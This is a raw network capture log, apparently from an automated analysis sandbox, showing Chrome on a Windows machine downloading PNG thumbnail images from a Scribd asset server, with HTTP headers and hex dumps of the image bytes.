                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 155
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 876992
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-klot8100110-CHI, cache-ewr-kewr1740023-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 42, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522381.012040,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 95 00 00 00 c6 08 03 00 00 00 ec 66 32 24 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 03 00 50 4c 54 45 22 1e 20 26 1b 1d 22 1e 22 22 1e 23 1f 1d 1e 22 1d 1b 24 20 20 22 1e 1e df 0a 0e ab 78 38 23 1e 20 1f 20 20 a9 77 35 a9 78 39 1f 20 1c 1f 1f 23 1f 1e 22 24 1e 1c ab 78 3c 20 20 1e 24 1d 22 24 20 22 24 1e 1d e2 08 0d 22 20 1b ad 76 37 a9 76 38 ab 78 3a 27 1b 18 aa 7a 30 1e 1b 1b 23 1b 22 1f 1e 27 26 1e 1c 1f 21 19 23 1f 17 25 1d 1f 24 1c 28 a9 78 3e 28 1b 10 1c 21 1b 26 1e 18 a7 7a 39 2c 1c 11 af 75 3d dc 0a 0f a6 7a 43 a9 78 3c 1d 20 20 af 76 31 b0 75 37 a6 7b 3d aa 7a 38 ac 77 2f ab 78 36 1f 1e 19 ac 77 34 22 20 14 27 22 22 ae 79 38 21 1f 27 a6 77
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRf2$gAMAasRGBPLTE" &"""#"$ "x8# w5x9 #"$x< $"$ "$" v7v8x:'z0#"'&!#%$(x>(!&z9,u=zCx< v1u7{=z8w/x6w4" '""y8!'w
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 7c 30 90 00 e1 74 52 e9 cb fa 50 ac b2 d9 0c dc 4d c7 a8 4c ea 9d 0b 52 42 e4 38 e4 0b c7 03 be 34 48 25 13 68 a9 bc 49 25 1a 92 4d 26 b3 ca 70 8a 62 b2 09 e4 3f 99 4c 80 4c 88 88 a2 d0 fb 02 18 93 63 62 99 00 16 de 75 a5 7c b1 e8 1e 23 0c 87 a3 e0 b7 b2 1d 32 18 15 f5 c6 84 0c 83 2a 31 2f 03 bd 31 10 67 00 08 44 85 ae 28 e5 f2 82 68 1c 5d 22 5e 74 4b de 78 14 7a 03 2e 8c 71 45 51 3a 40 2f 42 8b 78 b1 58 8c c1 90 0d ca db b8 17 8b 7b 61 d4 cb 79 83 de 88 0b 79 8f 06 5c 80 61 40 0c 55 bc 71 54 83 c8 b1 32 1a a0 62 81 38 15 e0 8c 21 fc b7 27 03 84 f9 cf af 5b 38 11 04 da 5d 44 7e 63 14 5a 28 6a ff 06 09 54 00 a8 7a 60 0d 39 11 9c 0e 4c 01 55 c8 68 c0 b5 a3 26 b4 c1 50 19 fc e7 f3 0a d9 50 87 6c 00 38 44 88 82 c4 ed 33 d6 08 e4 93 e0 97 5e 58 a8 82 fd ec 38
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: |0tRPMLRB84H%hI%M&pb?LLcbu|#2*1/1gD(h]"^tKxz.qEQ:@/BxX{ayy\a@UqT2b8!'[8]D~cZ(jTz`9LUh&PPl8D3^X8
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: e1 75 75 74 31 bf 83 65 22 dd d3 0d db 74 49 cb 95 96 aa a6 8d ab 93 f5 f6 c3 54 43 67 ce b0 6f a3 d1 50 45 e6 f3 ca ee 71 1b 1b e7 da 7f 7f f5 20 56 ba 37 4b 1c d5 d3 7d 2a 92 b4 2a 58 0d f8 af e3 26 1a 2f 82 4a 2e 57 9d a3 d6 b7 a6 ab 1a 1b 1d 25 ed db d3 1b f3 77 ec 87 a8 c8 53 24 fb d6 a3 a2 78 9f 6a 1c 51 f5 57 2e 1c a1 32 36 bd 85 07 54 bd 9c 2a fa 82 b8 49 a6 2b 26 56 90 6f e2 c9 3c 0b 3b ee 56 c5 70 9b 91 9c 59 7b 35 aa a1 e8 ea f5 3c d5 f6 b6 d5 60 10 df 78 d4 37 34 7c 6a 26 7f 8a 9e 77 5b 2b c4 8a 92 bf 5d 56 09 f2 0f 29 ea 7f 3c 52 38 fa c4 4d 2f aa 4d dc 1e 44 3c 62 3d ab d2 b5 a0 dd 84 95 17 fd 2c 2a 33 4f 3d 1c b7 e9 15 56 31 39 b6 f6 d3 45 9a d6 e5 a9 c8 57 0b 0b 0f 59 bd ea 6d 73 1c 50 0d b4 5b b7 2b 5f 5f 56 49 0b 54 f3 23 0a c7 a0 be 29
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: uut1e"tITCgoPEq V7K}**X&/J.W%wS$xjQW.26T*I+&Vo<;VpY{5<`x74|j&w[+]V)<R8M/MD<b=,*3O=V19EWYmsP[+__VIT#)
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 24 95 70 bf c7 6a f1 41 42 c8 03 06 0a 1a 46 28 ee c0 71 16 c7 29 3e 1f 43 10 b2 19 f1 83 5b 55 6b 20 b7 86 a2 84 f8 59 3f 37 02 89 60 d8 af d7 cb 64 24 26 01 39 06 41 3c 1e 2b 24 08 b9 5f 7a 46 ca e3 89 cc 66 09 48 81 ea be bb 62 18 ff df ae 0f 41 ce 9c 11 55 64 ae 88 84 f4 1f 7b 6e 1c e7 a6 ce 1e da 75 ce 13 8b cd 14 8a 2a af 5c 22 01 51 c0 4e 9a ec 38 a0 bc 78 2e 1f db 8d 65 3d 6e 17 fd d5 ed d0 9f a0 42 30 1e 4c d0 1f fa ab fa 90 d9 99 c9 16 55 61 3f e7 63 95 f2 11 d6 6b 1c a0 03 eb 7f 90 2b 3f 7d da 97 7b bd ea 6e 89 c7 61 a4 3a 54 21 cd 72 fd dd c2 ec 4a 1f b7 b2 5a db 38 ce ba 84 bc 53 a1 c2 5a 24 d7 a8 e9 37 8a 51 4e 5c 8d 60 26 f7 1e 6e 4d cb 1c bc 13 2a 87 84 4e 6f 4f 25 43 c6 60 53 7b d4 f0 a8 f4 f2 85 2b 3c 40 9d 50 91 ba c2 eb 77 cb d5 ed d0
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: $pjABF(q)>C[Uk Y?7`d$&9A<+$_zFfHbAUd{nu*\"QN8x.e=nB0LUa?ck+?}{na:T!rJZ8SZ$7QN\`&nM*NoO%C`S{+<@Pw
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 0f 4d dd 80 ea e9 a7 ff 7c b0 e4 67 1b 57 8b 01 d5 de 26 56 05 53 fe b7 96 e6 cd 79 40 ed e7 3f 92 4a 9f a9 c1 cd c0 61 08 13 e8 bb 44 54 50 aa ce 40 9e 31 3c da 57 27 00 55 b5 64 e7 8b f8 d2 2d ed 39 2f 97 2b 25 8d 2a be 34 d9 16 5f 83 34 95 f8 1d b2 84 fd 4a f9 86 94 f4 0d e7 9a 98 18 86 2c 2b db b3 67 f3 be 2a e5 ce cb 8f a0 62 5a 96 f3 b2 b5 b9 b9 cb d4 08 4b 9f 88 8a 23 d5 91 e4 af ae 92 09 a8 52 e3 be fa 10 50 15 5c 3c 54 06 83 57 5d c1 06 40 d5 ad 82 a5 c9 1a 26 cf 26 d8 b3 03 50 89 53 7e 6b 28 61 df d8 4d 53 fd 7d 1b 33 5b 68 d3 94 ce 69 6a 29 aa aa 7c 98 8a 6e fb 60 30 c0 0f e9 f2 07 1e 5c 6d 35 24 b3 32 7f 40 25 20 74 32 19 49 59 1a 42 0f 0c c4 c3 54 65 d9 08 9f 89 c9 f7 ac 48 af cc 97 6c 3f a0 b5 d9 9e 3d 6f 9d a7 2c 94 34 97 a9 4b 85 52 8c cf
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: M|gW&VSy@?JaDTP@1<W'Ud-9/+%*4_4J,+g*bZK#RP\<TW]@&&PS~k(aMS}3[hij)|n`0\m5$2@% t2IYBTeHl?=o,4KR
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 6c 4c 90 99 a9 81 39 20 f3 d0 3e 9a f4 ba e3 f7 13 71 15 8a a8 b3 be 58 11 01 69 c0 60 24 92 61 c6 93 d5 a2 0c 9c d2 18 42 ee b6 38 55 43 89 5e 46 fe 04 2a 23 09 62 51 6a b3 e0 59 59 59 aa 06 17 9d 8c 82 d1 a8 d3 e9 9c be 1d b7 b8 cd e1 f0 b8 23 93 a1 b0 2b 57 47 60 4b 93 19 4f 48 05 5b 28 83 df eb 10 cd 50 59 32 b3 0c 82 27 a7 a2 d3 0d 6e c1 e7 92 74 32 1a 1d 8e f4 d6 db 45 c0 3c 33 54 22 bb c8 3b 19 0a f8 49 1c af 10 40 d0 93 6b 1c 46 89 d1 3f ea 99 a1 ea f5 63 02 b3 8e f9 e4 54 66 b3 2c 17 cc a2 d8 bf 46 23 41 8f c3 e1 b0 8b ea c1 34 72 2b e8 00 02 32 af 0f 64 a6 06 d4 6c b6 b0 28 26 fe b8 4d da ef a9 e2 ee a4 96 85 3c a2 68 fc d9 9c 31 92 30 13 ac 84 63 e9 d1 9c f8 93 08 60 70 06 83 a5 4d 80 57 48 6c c4 77 1d 70 b4 89 e8 49 e4 76 47 3d 1e 0f b7 b8 98
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: lL9 >qXi`$aB8UC^F*#bQjYYY#+WG`KOH[(PY2'nt2E<3T";I@kF?cTf,F#A4r+2dl(&M<h10c`pMWHlwpIvG=
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 1d 0c b1 8c 34 58 fe 35 02 95 92 21 a4 54 52 52 82 e2 57 3b fc c9 81 cf 43 a2 7c 5a 76 89 5d 5b 92 9d a3 45 02 bb 2d 74 38 4a c8 6b b7 bb c4 db e8 ba 0a ed 6a 51 a7 c6 4b 64 e0 9e e9 c4 b8 84 99 3f 4c 2d bc ad 15 82 9d 62 50 0e 87 41 7d ac d6 6d 47 9d 44 5d db 49 69 95 36 9b 52 ab 24 85 5e 08 ed ab 45 01 b8 d0 e6 44 ae 97 9b aa 86 35 01 cf 0c 92 11 e3 a6 52 17 ba 10 15 fa a4 c7 9f 08 02 af e1 f5 0e 36 1f 6a 41 9b c3 61 03 32 24 21 03 71 7a 1d f9 0e a5 1b 5c 6f a1 34 d5 a4 53 63 66 09 ac ae 31 a6 9a 4b 15 98 f8 b3 40 a4 f0 31 51 31 75 86 22 97 70 80 e4 19 1a 0a eb 0f 4f 50 27 0a 4b 94 5e cf 55 58 a8 40 50 c9 64 86 70 b9 21 03 a1 25 2e c2 71 7f c2 18 23 6f 8f 91 0a d3 99 8b 5c 8c 11 a8 a8 16 73 90 f2 53 e5 c0 a4 6b 3c 7d be bd d6 40 ee f2 c2 d7 23 d3 5e fe
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 4X5!TRRW;C|Zv][E-t8JkjQKd?L-bPA}mGD]Ii6R$^ED5R6jAa2$!qz\o4Scf1K@1Q1u"pOP'K^UX@Pdp!%.q#o\sSk<}@#^
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 2d 36 22 91 27 e3 70 12 13 03 08 91 f4 a7 54 23 7b 67 2e 8a db e9 a3 29 47 1f 1d 15 2b dd b8 30 6d d8 19 54 8a 0a 45 32 b1 04 9f 06 b1 e8 aa a7 51 c5 e3 56 3c 96 a2 3a 3b 4b 3f fd 05 f3 ab b3 a2 88 38 3e 67 62 a8 8c 88 8a 8e fd 84 6a a4 08 f9 31 15 ab e0 f0 c7 1f d7 d7 9f ad af ff bb 1a 9f 08 aa e5 7e 2a c1 88 54 43 46 7b 28 45 85 0d 50 05 87 1d 07 6b 27 56 bc ad f9 f6 15 e9 c4 51 ad 28 e5 8c 44 35 d4 32 a0 b2 ab 0d 3b e2 e9 83 6d 45 d6 71 af fc f5 db f3 bf 95 8a 24 13 43 a5 19 2d 55 f0 53 a9 82 81 4a 31 57 a1 50 64 be 67 5c 7b 2e c8 3c 5e 2a 3c 04 33 5b ea e7 bc 29 4e 49 be 1e 35 34 81 a7 e3 45 95 ae 4e df b5 ab 60 ff 3a 09 1e 80 52 9f 5f aa 8a 55 aa e2 6d d1 22 ba 80 f3 19 b8 73 b1 78 eb 2d 3a cc 38 f9 17 8b 8a 35 1a 0d 59 a2 a7 c8 4c ff d3 39 7d 10 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: -6"'pT#{g.)G+0mTE2QV<:;K?8>gbj1~*TCF{(EPk'VQ(D52;mEq$C-USJ1WPdg\{.<^*<3[)NI54EN`:R_Um"sx-:85YL9}}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: b5 3c 32 94 54 b0 fb e4 25 7a eb 8b 7b c6 d9 f4 7c a7 b3 e3 87 a0 58 00 40 c9 67 43 52 10 e4 2d d5 2a e7 ef 52 82 26 d9 a6 fb f9 85 8a 56 54 51 44 77 5e 9a 7f 09 2f 21 34 d0 3d d7 d5 0a 09 8c 1d f5 b9 93 7a 71 e5 55 55 f0 5c 45 7a 80 b2 d9 77 d0 74 a6 45 ef 1c 51 76 f6 a1 1c 01 4a a2 56 5e 55 59 77 4e 5f 7a 52 ab 4b 8d 43 fa 9e af 7d ec 6a 06 74 ae c2 fb 03 2d af a2 83 06 c3 35 aa 45 0a 47 e2 79 13 09 69 f4 a0 72 38 4d e1 f3 0d 8f f8 26 4b 1d a5 9a f4 a7 2a 4a 35 b9 a6 ba 26 9d f1 e1 aa ad ac 38 78 8f 23 a9 a1 52 ae a8 10 57 fc d4 53 3f a7 b6 4e 71 37 56 1f 9b d8 78 57 40 7c ae c2 53 6c b7 4e 62 68 bd 46 65 62 3c ea 1b f6 fa 10 6b 4b fb 2e 1b 68 e3 db 24 06 83 01 28 1e b3 fe 13 15 84 b7 e3 f7 39 d1 8c 8f 4b e4 55 6b 95 4e 27 fe 2e b6 9f a9 dc a7 c6 40 e4
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <2T%z{|X@gCR-*R&VTQDw^/!4=zqUU\EzwtEQvJV^UYwN_zRKC}jt-5EGyir8M&K*J5&8x#RWS?Nq7VxW@|SlNbhFeb<kK.h$(9KUkN'.@
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC825INData Raw: bb 9c d9 06 19 6b d3 99 33 53 74 2a cb 19 d1 1c c7 c1 1a 8a 58 84 23 b1 88 88 ec 8d 99 21 84 b0 8a 5e cd 7a e5 2b df 27 c6 ea 0f e8 bd 7f 46 bf e7 74 4a be ea 45 10 c4 ed dd c3 9e e7 77 1f 38 78 ee f7 fb f1 fb 7e db e7 ff 02 55 a8 23 3c b4 0e 54 9c 4a ca a5 b5 fa 48 7a a8 f8 c9 a5 42 de 1e 4a 5f aa b3 a9 fc d9 e0 07 a3 6b a2 35 15 9e b7 a9 c6 69 de 3e 59 7f fd 0d 14 f6 ba 85 82 3f 96 2f 0c a6 52 ad ed f5 1d a1 c9 f0 ad 35 a3 f5 5e 5f 8c 01 aa f9 bb 50 79 01 95 d5 80 24 9a b7 4f dc 6f 9e 83 bc bd 46 55 47 33 19 4a 25 b2 a7 a8 ce 96 37 43 e9 48 ba f3 b1 d2 48 6e 8c 2c ec 15 a6 a6 22 e9 73 5f 92 d1 78 70 6f a6 79 6a ee 55 52 64 b2 59 56 f9 58 ea 0a 37 35 b5 2e bf 5b 20 b1 68 db c3 c5 c9 a6 c1 d1 e5 a7 f6 30 70 40 1c 3f 58 59 84 cc e0 f9 9d b1 b1 54 6a f0 41
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: k3St*X#!^z+'FtJEw8x~U#<TJHzBJ_k5i>Y?/R5^_Py$OoFUG3J%7CHHn,"s_xpoyjURdYVX75.[ h0p@?XYTjA


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        122192.168.2.1649864151.101.130.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC411OUTGET /img/word_document/211302755/149x198/e130bab094/1733400677?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-2-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 16048
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 103
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 121641
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-klot8100140-CHI, cache-ewr-kewr1740054-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 47, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522381.449916,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 95 00 00 00 c6 08 03 00 00 00 ec 66 32 24 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 03 00 50 4c 54 45 14 0e 0e 14 0c 0e 16 0e 0e f3 70 24 f3 6e 22 14 0e 10 12 0e 0c 14 0e 0c f3 6e 24 12 0e 0e 11 0c 0c f5 6e 24 16 0e 0c 12 0e 10 f5 6e 22 14 0c 0c f1 6e 24 f5 70 24 16 0c 0b 16 0c 0e f3 70 22 f1 70 24 0f 0d 10 11 0e 0a 0f 0e 0d 13 10 0b 12 0b 0d f4 70 25 f5 6f 26 10 0b 0b f1 70 21 15 10 0f 16 0e 10 18 0d 0e f5 6e 1f f3 6e 26 f5 70 21 11 10 0e f3 6e 20 19 11 0e 14 0c 09 1d 11 0d 11 0f 11 14 0e 0a 15 10 12 f7 70 23 f1 6e 22 ef 6f 23 0f 0b 0b 18 0e 0b 28 16 0e 24 15 0f f8 6e 22 14 0c 10 14 10 0e 0d 0b 0b 16 0b 10 f4 6f 28 33 1b 0f f8 6e 24 f9 70 24 46 23
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRf2$gAMAasRGBPLTEp$n"n$n$n"n$p$p"p$p%o&p!nn&p!n p#n"o#($n"o(3n$p$F#
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 89 14 00 b0 f1 6f 6b db 32 1f 8c 01 cd a2 61 1e 63 c0 0a 67 23 11 ac 6b 71 8a 96 2b 72 16 a3 6c c1 b1 50 e9 47 d6 b6 9e 1a 3a 28 b2 02 f1 73 32 a9 16 c3 54 0b 02 fc 6c c7 b1 32 c6 3f f6 a6 a2 44 21 cf 71 c8 c5 71 99 fe 67 f9 c5 81 52 3f a3 30 0d db e9 28 96 23 70 3f e3 bb a4 0e 5d 10 74 d6 8e 8c 94 52 1a 08 db 6a f6 c8 ef a8 68 07 9d b7 99 50 71 b9 25 e5 87 8a 94 25 61 73 46 eb 76 14 bd 19 5f de bc 84 93 1b da 37 b5 8f 9c dc b6 ca 48 85 57 01 2e af 9e 4e 78 fd ce 57 80 5d d6 1a a1 7a d1 d7 7e ac 27 dc 96 eb e6 ae b4 08 51 15 c5 9b 76 ba 65 57 6e 3a 23 67 bd 68 30 94 0a 22 aa bd 7b 5f d8 e5 2f 46 6f d2 84 a8 d0 59 42 c5 fc b9 af 3d d0 38 74 a0 28 ce 5d 57 4c 47 73 db b2 c5 95 9d c9 f8 19 2e 9c 20 ef 4e 35 92 0a 21 c7 99 57 6d fb d7 15 05 79 24 c5 ae 60 ba
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ok2acg#kq+rlPG:(s2Tl2?D!qqgR?0(#p?]tRjhPq%%asFv_7HW.NxW]z~'QveWn:#gh0"{_/FoYB=8t(]WLGs. N5!Wmy$`
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 84 f8 f8 d4 f5 eb 29 16 c4 fe 81 a8 25 27 03 dd 82 05 d1 17 f9 ba e6 e1 df 9b 4a 0a 8e 74 76 7e 75 ac 90 72 e4 b5 b4 93 85 73 d3 8a 77 be fa f4 d1 b1 33 3b 0e 55 fe 7a 74 43 a4 bf 44 e7 1c eb a6 ee ca cd 67 0f 6c 39 d4 7d b5 ef 79 63 30 3e 56 b9 8e fc 9f 9c b5 b5 5b 0f 36 3d 2a 3e 4d 59 70 9e e3 7d a9 9c 47 76 9a e2 b8 a4 a6 a5 0e 5b a0 c2 cf 84 37 16 bf 6d 67 76 54 be 32 9c 1b 36 25 8e 2c e5 59 31 16 41 ed 6a 96 3c e4 5a 12 4e 77 b9 fc 71 d9 d3 f7 3f a7 b0 88 ed 7c 4e 8e 58 d3 53 b8 7c ac f8 fb ce b3 87 c7 1c 79 ef bd d5 54 15 99 32 b8 ac ef 45 48 07 d6 b9 94 95 4a 2d 54 df b6 ea da 8c 8d 0d 26 57 e6 73 dd e7 a5 62 5f 21 f8 ab ca 92 5d 72 d6 87 fb d2 e5 0f 5c 8a 49 2e 5b c6 22 08 c6 96 0b a9 e5 7d 2b 96 db 0b ec 2d 5b d7 ee 9a 77 bc ef 6e 41 1d 2c e2 5c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )%'Jtv~ursw3;UztCDgl9}yc0>V[6=*>MYp}Gv[7mgvT26%,Y1Aj<ZNwq?|NXS|yT2EHJ-T&Wsb_!]r\I.["}+-[wnA,\
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 18 58 e0 fc f3 59 f3 e4 f7 75 99 69 76 90 fd a6 b2 29 f3 64 45 6e b0 54 8c b1 d1 b2 8b 80 2e 2c c0 32 7b 59 8b 45 43 55 a4 09 eb 53 46 c5 74 1b c2 20 de f1 45 f1 b9 8e 8e 68 ca 42 f2 0f 4e 63 32 10 d3 e5 7e 21 08 88 76 47 6e cf 8c 21 15 74 ad 0e 93 cb 10 f3 ca af ab 77 8e 3b 76 b4 54 66 a2 35 8f df 3b f6 9f 0e da 97 26 fc 96 6a 09 27 4e 5c 66 d5 09 79 06 42 81 9e ed 15 a8 64 09 69 e7 ac e1 8e b0 e8 12 93 31 e9 30 1f c2 43 74 7c 15 82 c9 d9 8d bd 2e 2b 49 19 2a 3f 83 9b 48 02 a5 35 2b 3a 25 2c 4d 5e 71 fd 2b 73 7f d4 6f 35 c2 9a a3 3c eb 4b d7 6a b0 52 01 36 fd 01 92 34 58 07 d3 b4 b8 be 24 95 8a dd da 21 6a 85 60 75 10 81 2a 62 1c 47 22 65 5a 63 33 84 52 0a aa 3b 23 41 02 6b 93 6a 88 10 02 3a 10 6a eb 75 85 08 61 70 c7 64 36 e1 60 95 85 df b9 0d 5d 1d a9
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: XYuiv)dEnT.,2{YECUSFt EhBNc2~!vGn!tw;vTf5;&j'N\fyBdi10Ct|.+I*?H5+:%,M^q+so5<KjR64X$!j`u*bG"eZc3R;#Akj:juapd6`]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 41 7a 1c 86 e7 fd e8 ca d2 ea ea e3 e1 c5 6b 87 0d 71 2f 06 4f 1a b8 20 9f 1a dd 6c 6d ed 14 04 8a f2 35 cb 4e a7 54 ba 6d a4 22 0a bb 3d 9b eb bc 85 74 56 80 be 92 9b 9d fd a6 70 0a ed 61 e4 27 6d 35 a7 fa e4 cc f1 24 0b 9b 52 cf bf fc fb 97 99 40 62 a1 a4 02 20 ce e1 3a cd 90 fa fb 87 1d 39 09 d1 7a 8e 53 d5 f1 dd 05 93 b0 0f f8 c9 4e 5e 92 1f 8d 82 f2 70 ca 32 50 a9 60 e9 65 95 83 76 d4 ec f8 39 29 78 ef 69 83 01 3f 96 38 2b 38 de 48 68 7c 80 0e 2c 15 7a e4 d0 5a 39 94 c4 2f 8f bf e3 82 75 d6 13 2f d4 1f 39 29 27 10 c7 20 f2 4a 73 e4 48 16 80 64 5f 1f 01 2b 18 cd a5 cf 61 c4 49 63 3c e4 b1 8f 92 20 3b 29 0a 2d 16 f8 25 49 8a de 66 91 c5 c9 6d 31 18 0c 8e 1f c6 1d fc 68 29 28 fb ea da dd 49 9a 8e 84 77 87 3a 7d 07 57 db ca 3c f1 b7 5f 0e 54 4e 76 a5 1b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Azkq/O lm5NTm"=tVpa'm5$R@b :9zSN^p2P`ev9)xi?8+8Hh|,zZ9/u/9)' JsHd_+aIc< ;)-%Ifm1h)(Iw:}W<_TNv
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 9a 42 6a c7 eb 42 3b 48 c5 54 aa 9f 37 03 0d 37 33 5c 90 cb 8c 68 0c 9d 60 76 81 ea a7 36 97 6d 54 1e ef 8e 28 51 e2 75 3e c9 bf ae 2b a3 7a ac 27 11 f6 b2 5f e5 40 47 e1 f9 2f be 26 7f 08 7c e1 59 be 42 54 d9 92 e4 12 4a 93 9e 44 cd 71 f7 12 b6 d7 0d 2c c1 f5 f3 29 cd 88 e7 af 06 43 b1 ae b0 43 d1 3c da aa 4f 95 84 bb 45 1b 95 8e 50 c9 2a c8 68 86 a3 3e 1f b2 51 e5 03 8c ce 46 a6 a6 2d 59 ad f5 01 49 b6 72 9c 60 59 8f 34 9a ae 48 18 92 78 16 b9 80 70 fe 25 fc da 7e 03 67 f6 81 25 81 b5 33 0c 3b d2 51 2b a8 9d 6b e1 86 6a 6f 9c 7e 12 a2 80 10 7b 60 a3 d2 d0 0e ca 3e b5 40 c3 44 f2 73 f9 03 8b 5d c2 ad 45 4c ba af 19 50 56 93 20 1f 84 80 0c 9c d3 53 d0 dd 50 09 2a 02 7a 6f 97 04 19 9c 7f 14 a0 b5 b2 b7 13 f4 b3 f4 3b 27 68 ea f0 c6 cd b6 21 e4 73 9d 13 6c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: BjB;HT773\h`v6mT(Qu>+z'_@G/&|YBTJDq,)CC<OEP*h>QF-YIr`Y4Hxp%~g%3;Q+kjo~{`>@Ds]ELPV SP*zo;'h!sl
